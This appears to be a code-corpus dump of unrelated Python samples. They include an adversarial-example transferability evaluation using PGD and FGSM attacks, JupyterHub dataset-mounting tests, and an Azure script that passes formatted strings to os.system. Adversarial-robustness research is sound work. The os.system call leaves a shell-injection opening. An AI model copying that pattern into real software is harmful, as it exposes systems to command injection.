dirr_1 = 'advtrained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_1 = '_'+is_target_1+FLAGS.attack_method_for_advtrain_1
adv_ratio_name_1 = '_advratio'+str(FLAGS.adv_ratio_1)
mean_var_1 = int(FLAGS.mean_var_1)
else:
dirr_1 = 'trained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_1 = ''
adv_ratio_name_1 = ''
mean_var_1 = FLAGS.mean_var_1
if FLAGS.use_MMLDA_1==True:
print('Using MMLDA for model 1, the substitute model')
new_layer_1 = Lambda(MMLDA_layer_1)
predictions_1 = new_layer_1(final_features_1)
model_1 = Model(input=model_input_1, output=predictions_1)
use_ball_1=''
if FLAGS.use_ball_1==False:
print('Using softmax function for model 1')
use_ball_1='_softmax'
filepath_dir_1 = dirr_1+'resnet32v'+str(version)+'_meanvar'+str(mean_var_1) \
+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size) \
+attack_method_for_advtrain_1+adv_ratio_name_1+BN_name+name_leaky+name_dense+name_random+use_ball_1+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
else:
print('Using softmax loss for model 1')
model_1 = original_model_1
filepath_dir_1 = dirr_1+'resnet32v'+str(version)+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size)+attack_method_for_advtrain_1+adv_ratio_name_1+BN_name+name_leaky+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
wrap_ensemble_1 = KerasModelWrapper(model_1, num_class=num_class)
model_1.load_weights(filepath_dir_1)
##### Load model 2 #####
#Whether use target attack for adversarial training
if FLAGS.use_target_2==False:
is_target_2 = ''
else:
is_target_2 = 'target'
if FLAGS.use_advtrain_2==True:
dirr_2 = 'advtrained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_2 = '_'+is_target_2+FLAGS.attack_method_for_advtrain_2
adv_ratio_name_2 = '_advratio'+str(FLAGS.adv_ratio_2)
mean_var_2 = int(FLAGS.mean_var_2)
else:
dirr_2 = 'trained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_2 = ''
adv_ratio_name_2 = ''
mean_var_2 = FLAGS.mean_var_2
if FLAGS.use_MMLDA_2==True:
print('Using MMLDA for model 2, the original model')
new_layer_2 = Lambda(MMLDA_layer_2)
predictions_2 = new_layer_2(final_features_2)
model_2 = Model(input=model_input_2, output=predictions_2)
use_ball_2=''
if FLAGS.use_ball_2==False:
print('Using softmax function for model 2')
use_ball_2='_softmax'
filepath_dir_2 = dirr_2+'resnet32v'+str(version)+'_meanvar'+str(mean_var_2) \
+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size) \
+attack_method_for_advtrain_2+adv_ratio_name_2+BN_name+name_leaky+name_dense+name_random+use_ball_2+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
else:
print('Using softmax loss for model 2')
model_2 = original_model_2
filepath_dir_2 = dirr_2+'resnet32v'+str(version)+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size)+attack_method_for_advtrain_2+adv_ratio_name_2+BN_name+name_leaky+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
wrap_ensemble_2 = KerasModelWrapper(model_2, num_class=num_class)
model_2.load_weights(filepath_dir_2)
# Initialize the attack method
if FLAGS.attack_method == 'MadryEtAl':
att = attacks.MadryEtAl(wrap_ensemble_1)
elif FLAGS.attack_method == 'FastGradientMethod':
att = attacks.FastGradientMethod(wrap_ensemble_1)
elif FLAGS.attack_method == 'MomentumIterativeMethod':
att = attacks.MomentumIterativeMethod(wrap_ensemble_1)
elif FLAGS.attack_method == 'BasicIterativeMethod':
att = attacks.BasicIterativeMethod(wrap_ensemble_1)
# Consider the attack to be constant
eval_par = {'batch_size': FLAGS.batch_size}
for eps in range(2):
eps_ = (eps+1) * 8
print('eps is %d'%eps_)
eps_ = eps_ / 256.0
if FLAGS.target==False:
y_target = None
if FLAGS.attack_method == 'FastGradientMethod':
att_params = {'eps': eps_,
'clip_min': clip_min,
'clip_max': clip_max,
'y_target': y_target}
else:
att_params = {'eps': eps_,
#'eps_iter': eps_*1.0/FLAGS.num_iter,
#'eps_iter': 3.*eps_/FLAGS.num_iter,
'eps_iter': 2. / 256.,
'clip_min': clip_min,
'clip_max': clip_max,
'nb_iter': FLAGS.num_iter,
'y_target': y_target}
adv_x = tf.stop_gradient(att.generate(x_place, **att_params))
preds = model_2(adv_x)
if FLAGS.target==False:
acc = model_eval(sess, x_place, y_place, preds, x_test, y_test, args=eval_par)
print('adv_acc of model 1 transfer to model 2 is: %.3f' %acc)
else:
acc = model_eval_targetacc(sess, x_place, y_place, y_target, preds, x_test, y_test, y_test_target, args=eval_par)
print('adv_acc_target of model 1 transfer to model 2 is: %.3f' %acc)
| StarcoderdataPython |
1651722 | # ######################################################################################################################
# Copyright 2020 TRIXTER GmbH #
# #
# Redistribution and use in source and binary forms, with or without modification, are permitted provided #
# that the following conditions are met: #
# #
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the #
# following disclaimer in the documentation and/or other materials provided with the distribution. #
# #
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE #
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, #
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS #
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF #
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY #
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# ######################################################################################################################
from tractor.api.author.base import *
class Command(KeyValueElement):
"""Command Patch"""
def __init__(self, local=False, **kw):
if local:
# this fixes the bug that `Command` would end up in the resulting Tcl
# causing a `SEVERE tractor_spool problem (ingress rc = 1)`
cmdtype = "Cmd" # <- "Command"
else:
cmdtype = "RemoteCmd"
attributes = [
Constant(cmdtype),
ArgvAttribute("argv", required=True, suppressTclKey=True),
StringAttribute("msg"),
StringListAttribute("tags"),
StringAttribute("service"),
StringAttribute("metrics"),
StringAttribute("id"),
StringAttribute("refersto"),
BooleanAttribute("expand"),
IntAttribute("atleast"),
IntAttribute("atmost"),
IntAttribute("minrunsecs"),
IntAttribute("maxrunsecs"),
BooleanAttribute("samehost"),
StringListAttribute("envkey"),
IntListAttribute("retryrc"),
WhenStringAttribute("when"),
StringListAttribute("resumewhile"),
BooleanAttribute("resumepin"),
StringAttribute("metadata")
]
super(Command, self).__init__(attributes, **kw)
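# --- Hedged usage sketch (editor's addition, not part of the original patch module) ---
# Constructing commands with the patched class; argv/service values are placeholders.
if __name__ == "__main__":
    remote_cmd = Command(argv=["/usr/bin/echo", "hello"], service="PixarRender")
    local_cmd = Command(local=True, argv=["/usr/bin/echo", "hello"])
    # With local=True the element is emitted as "Cmd" rather than "Command", which is the
    # tractor_spool ingress problem this patch works around.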
| StarcoderdataPython |
1785024 | <gh_stars>10-100
import numpy as np
from collections import deque
class HistoryBuffer():
def __init__(self,preprocess_fn,image_shape,frames_for_state) :
self.buf = deque(maxlen=frames_for_state)
self.preprocess_fn = preprocess_fn
self.image_shape = image_shape
self.clear()
def clear(self) :
for i in range(self.buf.maxlen):
self.buf.append(np.zeros(self.image_shape,np.float32))
def add(self,o) :
#assert( list(o.shape) == self.image_shape ),'%s, %s'%(o.shape,self.image_shape)
self.buf.append(self.preprocess_fn(o))
state = np.concatenate([img for img in self.buf], axis=2)
return state
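# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Stacking four 84x84 grayscale frames into one state, using an identity preprocessor.
if __name__ == '__main__':
    buf = HistoryBuffer(preprocess_fn=lambda o: o,
                        image_shape=[84, 84, 1],
                        frames_for_state=4)
    frame = np.zeros([84, 84, 1], np.float32)
    state = buf.add(frame)
    print(state.shape)  # (84, 84, 4): buffered frames are concatenated along axis 2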
| StarcoderdataPython |
1732257 | from django.conf.urls import include
from django.conf.urls import patterns
from django.contrib import admin
from survey.urls import urlpatterns as survey_urls
from django.conf import settings
from django.conf.urls import (handler400, handler403, handler404, handler500)
admin.autodiscover()
urlpatterns = patterns('',
(r'^admin/', include(admin.site.urls)),
(r'^admin/rq/', include('django_rq_dashboard.urls'))
) + survey_urls
handler400 = 'survey.views.home_page.custom_400'
handler403 = 'survey.views.home_page.custom_403'
handler404 = 'survey.views.home_page.custom_404'
handler500 = 'survey.views.home_page.custom_500'
| StarcoderdataPython |
3205580 | <filename>blueprints/azure_functions/management/start_function.py<gh_stars>10-100
"""
Start an azure function.
"""
from common.methods import set_progress
from infrastructure.models import CustomField
from common.methods import generate_string_from_template
import os, json
def run(job, resource, **kwargs):
function_name = resource.attributes.get(field__name='azure_function_name').value
function_resource_group = resource.attributes.get(field__name='resource_group_name').value
set_progress('Starting the function...')
try:
start_function_command = "az functionapp start --name {0} --resource-group {1}".format(function_name, function_resource_group)
os.system(start_function_command)
except Exception:
return "FAILURE", "The function app could not be started", ""
return "SUCCESS", "The function app was succesfully started.", "" | StarcoderdataPython |
3279072 | from algo.number_theory.ncr.ncr import ncr
def ncr_lucas(n, r, pmod):
"""
Complexity -> O(logn base pmod).
"""
if r == 0:
return 1
next_n, n = divmod(n, pmod)
next_r, r = divmod(r, pmod)
return ncr(n, r, pmod) * ncr_lucas(next_n, next_r, pmod) % pmod
def main():
print(ncr_lucas(10, 5, 1000000007))
if __name__ == "__main__":
main()
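# --- Worked example (editor's addition) ---
# C(10, 5) = 252. With pmod = 7 the base-7 digits are 10 -> (1, 3) and 5 -> (0, 5), so
# Lucas gives C(1, 0) * C(3, 5) mod 7 = 1 * 0 = 0, matching 252 mod 7 = 0 (252 = 7 * 36).
# With the large prime 1000000007 both numbers fit in one digit, so the result is just 252.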
| StarcoderdataPython |
3577 | """
# Definition for a Node.
"""
class TreeNode(object):
def __init__(self, val, children):
self.val = val
self.children = children
class Solution(object):
def levelOrder(self, root):
"""
:type root: Node
:rtype: List[List[int]]
"""
if root is None:
return []
from Queue import Queue
que = Queue()
que.put(root)
ans, tmp, k = [], [], 1
while que.qsize() != 0:
node = que.get()
tmp.append(node.val)
k -= 1
for child in node.children:
que.put(child)
if k == 0:
k = que.qsize()
ans.append(list(tmp))
tmp = []
return ans
node2 = TreeNode(2, [])
node3 = TreeNode(3, [])
children = [node2, node3]
node1 = TreeNode(1, children)
solution = Solution()
print(solution.levelOrder(node1))
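# --- Expected output (editor's addition) ---
# The tree above is 1 -> [2, 3], so the level-order traversal prints [[1], [2, 3]].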
| StarcoderdataPython |
1763427 | from dataclasses import dataclass
@dataclass
class JupyterAPI:
host: str = "127.0.0.1"
port: int = 8888
token: str = ""
| StarcoderdataPython |
1603773 | from collections import deque
d = deque()
N = int(input())
for _ in range(N):
cmd, *args = input().split()
getattr(d, cmd)(*args)
print(*d, sep=" ")
| StarcoderdataPython |
3366626 | # -*- coding: utf-8 -*-
"""
@date: 2021/9/25 下午12:16
@file: resnet.py
@author: zj
@description:
"""
import torch
from rfd.model.resnet.resnet import get_resnet
from rfd.config.key_word import KEY_FEAT
if __name__ == '__main__':
# model = get_resnet(arch='resnet18')
model = get_resnet(arch='resnet50')
print(model.get_distill_channels())
data = torch.randn(1, 3, 224, 224)
res_dict = model(data)
for feats in res_dict[KEY_FEAT]:
print(feats.shape)
print(model.get_distill_channels())
| StarcoderdataPython |
3244909 | from typing import Callable
import torch
from torch import nn
from torch.optim import Optimizer
from torch.optim.lr_scheduler import _LRScheduler
from tqdm import tqdm
from ..chemprop.data import MoleculeDataLoader
from ..chemprop.nn_utils import compute_gnorm, compute_pnorm, NoamLR
def train(model: nn.Module, data_loader: MoleculeDataLoader,
loss_func: Callable, optimizer: Optimizer,
scheduler: _LRScheduler, uncertainty: bool,
n_iter: int = 0, disable: bool = False) -> int:
"""Trains a model for an epoch
Parameters
----------
model : nn.Module
the model to train
data_loader : MoleculeDataLoader
an iterable of MoleculeDatasets
loss_func : Callable
the loss function
optimizer : Optimizer
the optimizer
scheduler : _LRScheduler
the learning rate scheduler
uncertainty : bool
whether the model predicts its own uncertainty
n_iter : int, default=0
the current number of training iterations
disable : bool, default=False
whether to disable the progress bar
Returns
-------
n_iter : int
The total number of samples trained on so far
"""
model.train()
# loss_sum = 0
# iter_count = 0
for batch in tqdm(data_loader, desc='Training', unit='step',
leave=False, disable=disable,):
# Prepare batch
mol_batch, targets = batch#.batch_graph()
# features_batch = batch.features()
# Run model
model.zero_grad()
preds = model(mol_batch)#, features_batch)
# targets = batch.targets() # targets might have None's
mask = torch.tensor(
[list(map(bool, ys)) for ys in targets]
).to(preds.device)
targets = torch.tensor(
[[y or 0 for y in ys] for ys in targets]
).to(preds.device)
class_weights = torch.ones(targets.shape).to(preds.device)
# if args.dataset_type == 'multiclass':
# targets = targets.long()
# loss = (torch.cat([
# loss_func(preds[:, target_index, :],
# targets[:, target_index]).unsqueeze(1)
# for target_index in range(preds.size(1))
# ], dim=1) * class_weights * mask
# )
if uncertainty:
pred_means = preds[:, 0::2]
pred_vars = preds[:, 1::2]
loss = loss_func(pred_means, pred_vars, targets)
else:
loss = loss_func(preds, targets) * class_weights * mask
loss = loss.sum() / mask.sum()
# loss_sum += loss.item()
# iter_count += len(batch)
loss.backward()
optimizer.step()
if isinstance(scheduler, NoamLR):
scheduler.step()
n_iter += len(batch)
# Log and/or add to tensorboard
# if (n_iter // args.batch_size) % args.log_frequency == 0:
# lrs = scheduler.get_lr()
# pnorm = compute_pnorm(model)
# gnorm = compute_gnorm(model)
# loss_avg = loss_sum / iter_count
# loss_sum, iter_count = 0, 0
# lrs_str = ', '.join(
# f'lr_{i} = {lr:.4e}' for i, lr in enumerate(lrs))
# debug(f'Loss = {loss_avg:.4e}, PNorm = {pnorm:.4f}, '
# + f'GNorm = {gnorm:.4f}, {lrs_str}')
# if writer:
# writer.add_scalar('train_loss', loss_avg, n_iter)
# writer.add_scalar('param_norm', pnorm, n_iter)
# writer.add_scalar('gradient_norm', gnorm, n_iter)
# for i, lr in enumerate(lrs):
# writer.add_scalar(f'learning_rate_{i}', lr, n_iter)
return n_iter
| StarcoderdataPython |
3295283 | import unittest
from unittest import mock
import copy
from tornado import gen
from tornado import testing
from jupyterhub_profiles import PrimeHubSpawner, OIDCAuthenticator
import jupyterhub
def mock_spawner():
return PrimeHubSpawner(_mock=True)
class AuthStateBuilder(object):
def __init__(self):
import uuid
self.data = dict(sub=uuid.uuid4().hex,
roles=[
"offline_access",
"uma_authorization",
"img:base-notebook",
"it:cpu-only"
], email_verified=True, preferred_username="tester")
self.data['quota'] = dict(gpu=0)
self.data['project-quota'] = dict(gpu=0)
self.launch_context = dict(groups=[])
self.data['groups'] = []
self._datasets_builder = _DatasetsBuilder()
self.add_group('everyone')
self.add_group('phusers')
def add_group(self, name, **kwargs):
self.launch_context['groups'].append(dict(name=name, datasets=[], **kwargs))
self.data['groups'].append("/%s" % name)
def add_dataset_role(self, group_name, name, dataset_type, **kwargs):
if "/%s" % group_name in self.data['groups']:
self.data['roles'].append("ds:%s" % name)
if 'git' == dataset_type:
ds = self._datasets_builder.add_git(name, **kwargs).data[-1]
if 'pv' == dataset_type:
ds = self._datasets_builder.add_pv(name, **kwargs).data[-1]
if 'hostPath' == dataset_type:
ds = self._datasets_builder.add_hostpath(name, **kwargs).data[-1]
if 'nfs' == dataset_type:
ds = self._datasets_builder.add_nfs(name, **kwargs).data[-1]
if 'env' == dataset_type:
ds = self._datasets_builder.add_env(name, **kwargs).data[-1]
ds = copy.deepcopy(ds)
ds['name'] = ds['metadata']['name']
ds['global'] = kwargs.get('dataset_global', False)
ds['writable'] = kwargs.get('writable', False)
del ds['metadata']
for g in self.launch_context['groups']:
if g['name'] == group_name:
g['datasets'].append(ds)
return self
def add_image_role(self, name):
self.data['roles'].append("img:%s" % name)
return self
def add_instance_type_role(self, name):
self.data['roles'].append("it:%s" % name)
return self
@gen.coroutine
def get_oauth_user(self):
return self.data
@gen.coroutine
def get_launch_context(self):
return self.launch_context
def get_datasets(self):
return self._datasets_builder.get_datasets()
def get_auth_state(self):
return dict(
launch_context=self.get_launch_context(),
oauth_user=self.get_oauth_user())
class _DatasetsBuilder(object):
def __init__(self):
self.data = []
def _template(self, name, **kwargs):
tpl = dict(metadata=dict(name=name, annotations=dict()),
spec=dict(description="", displayName=name, type="", url="", variables=dict(), volumeName=""))
for k, v in kwargs.items():
tpl['metadata']['annotations']["dataset.primehub.io/%s" % k] = v
return tpl
def add_git(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['metadata']['annotations']['primehub-gitsync'] = True
tpl['spec']['type'] = 'git'
self.data.append(tpl)
return self
def add_pv(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'pv'
tpl['spec']['volumeName'] = kwargs['volumeName']
self.data.append(tpl)
return self
def add_hostpath(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'hostPath'
tpl['spec']['hostPath'] = {'path': kwargs['path']}
self.data.append(tpl)
return self
def add_nfs(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'nfs'
tpl['spec']['nfs'] = {'path': kwargs['path'], 'server': kwargs['server']}
self.data.append(tpl)
return self
def add_env(self, name, **kwargs):
tpl = self._template(name, **kwargs)
tpl['spec']['type'] = 'env'
del tpl['metadata']['annotations']
for k, v in kwargs.items():
tpl['spec']['variables']['%s' % k] = v
self.data.append(tpl)
return self
def get_datasets(self):
return self.data
class FakeAuthenticator(OIDCAuthenticator):
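    """OIDCAuthenticator stub that skips the volume-capacity lookup and serves the builder's datasets instead of querying the cluster."""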
def user_volume_capacity(self, auth_state):
return None
def get_custom_resources(self, namespace, plural):
return self.datasets
class TestPreSpawner(testing.AsyncTestCase):
def setUp(self):
testing.AsyncTestCase.setUp(self)
self.spawner = mock_spawner()
# user select phusers group
self.spawner.user_options['group'] = dict(name='phusers')
self.builder = AuthStateBuilder()
self.spawner.user.get_auth_state = mock.Mock()
self.spawner.user.get_auth_state.return_value = self.builder.get_auth_state()
self.authenticator = FakeAuthenticator()
self.authenticator.datasets = self.builder.get_datasets()
def get_ln_command(self):
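        # The postStart lifecycle hook is a single "cmd1; cmd2; ..." shell string; split it so tests can assert on individual ln commands.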
ln_command = self.spawner.singleuser_lifecycle_hooks['postStart']['exec']['command']
ln_command = [x.strip() for x in ln_command[-1].split(';')]
return ln_command
@testing.gen_test
async def test_group_share_volume_mount(self):
self.builder.add_group('i_have_a_volume', enabledSharedVolume=True, sharedVolumeCapacity=100, launchGroupOnly=False)
self.authenticator.attach_project_pvc = mock.Mock(return_value=None)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertIn("/project/i-have-a-volume", self.authenticator.chown_extra)
@testing.gen_test
    async def test_spawn_without_global_dataset(self):
del self.builder.launch_context['groups'][0]['datasets']
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual([{'configMap': {'defaultMode': 511, 'name': 'primehub-start-notebook'},
'name': 'primehub-start-notebook'}], self.spawner.volumes)
@testing.gen_test
async def test_git_mount_without_annotations(self):
"""
gitSyncHostRoot : None => /home/dataset/
gitSyncRoot : None => /gitsync/
mountRoot : None => /datasets/
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='git', name='foo')
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("/home/dataset/foo",
self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/gitsync/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /gitsync/foo/foo /datasets/foo",
self.get_ln_command())
self.assertNotIn("ln -sf /gitsync/foo/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_git_mount_with_annotations_and_not_ending_slash(self):
"""
gitSyncHostRoot : /home/dataset
gitSyncRoot : /gitsync
mountRoot : /datasets
"""
annotations = dict(gitSyncHostRoot='/home/dataset',
gitSyncRoot='/gitsync', mountRoot='/datasets')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='git', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("/home/dataset/foo",
self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/gitsync/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /gitsync/foo/foo /datasets/foo",
self.get_ln_command())
self.assertNotIn("ln -sf /gitsync/foo/foo .", self.get_ln_command())
@testing.gen_test
async def test_pv_mount_without_annotations(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'false'
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='pv', name='foo', **dict(volumeName='foo'))
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"dataset-foo", self.spawner.volumes[0]['persistentVolumeClaim']['claimName'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertNotIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_pv_mount_with_annotations_enable_home_symlink_and_without_ending_slash(self):
"""
mountRoot : /datasets
homeSymlink : 'true'
"""
annotations = dict(mountRoot='/datasets',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='pv', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"dataset-foo", self.spawner.volumes[0]['persistentVolumeClaim']['claimName'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_dataset_not_in_launch_context_groups_bind_and_not_global(self):
"""
mountRoot : /datasets
homeSymlink : 'true'
launchGroupOnly : 'false'
"""
annotations = dict(mountRoot='/datasets',
launchGroupOnly='false',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(group_name='others', name='ds_other', dataset_type='pv', writable=False, dataset_global=False, **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
# Shouldn't mount if dataset is not in users' group set and not global
self.assertEqual(1, len(self.spawner.volumes))
@testing.gen_test
async def test_dataset_without_group_bind_but_global_and_launchGroupOnly(self):
"""
mountRoot : /datasets
homeSymlink : 'true'
launchGroupOnly : 'true'
"""
annotations = dict(mountRoot='/datasets',
launchGroupOnly='true',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(group_name='everyone', name='ds_global', dataset_type='pv', writable=False, dataset_global=True, **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
        # Should mount read-only because the dataset is global, even though launchGroupOnly is true and it is not in the launch group
self.assertEqual(2, len(self.spawner.volumes))
self.assertEqual(True, self.spawner.volumes[0]['persistentVolumeClaim']['readOnly'])
@testing.gen_test
async def test_dataset_global_not_in_launch_group(self):
"""
global=true
writable=true
mountRoot : /datasets
homeSymlink : 'true'
launchGroupOnly : 'false'
"""
annotations = dict(mountRoot='/datasets',
launchGroupOnly='false',
homeSymlink='true', volumeName='foo')
self.builder.add_dataset_role(group_name='everyone', name='ds_global', dataset_type='pv', writable=True, dataset_global=True, **annotations)
self.builder.add_dataset_role(group_name='everyone', name='ds_global_readonly', dataset_type='pv', writable=False, dataset_global=True, **annotations)
# This one shouldn't mount.
self.builder.add_dataset_role(group_name='other', name='other_ds', dataset_type='pv', writable=False, dataset_global=True, **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual(3, len(self.spawner.volumes))
# Writable
self.assertEqual('dataset-ds_global', self.spawner.volumes[0]['name'])
self.assertEqual(False, self.spawner.volumes[0]['persistentVolumeClaim']['readOnly'])
# ReadOnly
self.assertEqual('dataset-ds_global_readonly', self.spawner.volumes[1]['name'])
self.assertEqual(True, self.spawner.volumes[1]['persistentVolumeClaim']['readOnly'])
@testing.gen_test
async def test_hostpath_mount_without_annotations(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'false'
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='hostPath', name='foo', **dict(path='/tmp/foobar'))
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/tmp/foobar", self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertNotIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_hostpath_mount_with_annotations_enable_home_symlink(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'true'
"""
# add dataset foo with annotations
annotations = dict(mountRoot='/datasets',
homeSymlink='true', path='/tmp/foobar')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='hostPath', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/tmp/foobar", self.spawner.volumes[0]['hostPath']['path'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_nfs_mount_without_annotations(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'false'
"""
# add dataset foo without annotations
self.builder.add_dataset_role(
group_name='phusers', dataset_type='nfs', name='foo', **dict(path='/', server='10.0.0.1'))
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/", self.spawner.volumes[0]['nfs']['path'])
self.assertEqual(
"10.0.0.1", self.spawner.volumes[0]['nfs']['server'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertNotIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
@testing.gen_test
async def test_nfs_mount_with_annotations_enable_home_symlink(self):
"""
mountRoot : None => /datasets/
homeSymlink : None => 'true'
"""
# add dataset foo with annotations
annotations = dict(mountRoot='/datasets',
homeSymlink='true', path='/', server='10.0.0.1')
self.builder.add_dataset_role(
group_name='phusers', dataset_type='nfs', name='foo', **annotations)
await self.authenticator.pre_spawn_start(self.spawner.user, self.spawner)
self.assertEqual("dataset-foo", self.spawner.volumes[0]['name'])
self.assertEqual(
"/", self.spawner.volumes[0]['nfs']['path'])
self.assertEqual(
"10.0.0.1", self.spawner.volumes[0]['nfs']['server'])
self.assertEqual(
"/datasets/foo", self.spawner.volume_mounts[0]['mountPath'])
# check symbolic link
self.assertIn("ln -sf /datasets /home/jovyan/", self.get_ln_command())
self.assertIn("ln -sf /datasets/foo /home/jovyan/", self.get_ln_command())
def test_mount_env_datasets_launch_group_only(self):
options = dict(launchGroupOnly='true',
FOO='bar')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.builder.add_dataset_role(
group_name='fake_group', name='fake_project', dataset_type='env', dataset_global=False, writable=True, **options)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='fake_group', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_project', self.builder.get_datasets()[0])
self.assertEqual(result, True)
self.assertEqual(self.spawner.environment.get('FAKE_PROJECT_FOO'), 'bar')
def test_mount_git_datasets_not_global_and_not_in_launch_group(self):
annotations = dict(mountRoot='/datasets',
launchGroupOnly='true',
homeSymlink='true', volumeName='foo')
auth_state = dict(
launch_context=self.builder.launch_context,
oauth_user=self.builder.data
)
self.authenticator.symlinks = []
self.authenticator.chown_extra = []
self.builder.add_dataset_role(
group_name='fake_group', name='fake_project', dataset_type='git', dataset_global=False, writable=True, **annotations)
global_datasets = self.authenticator.get_global_datasets(auth_state['launch_context']['groups'])
datasets_in_launch_group = self.authenticator.get_datasets_in_launch_group(
launch_group_name='phusers', auth_state=auth_state)
result = self.authenticator.mount_dataset(self.spawner, global_datasets, datasets_in_launch_group, 'fake_project', self.builder.get_datasets()[0])
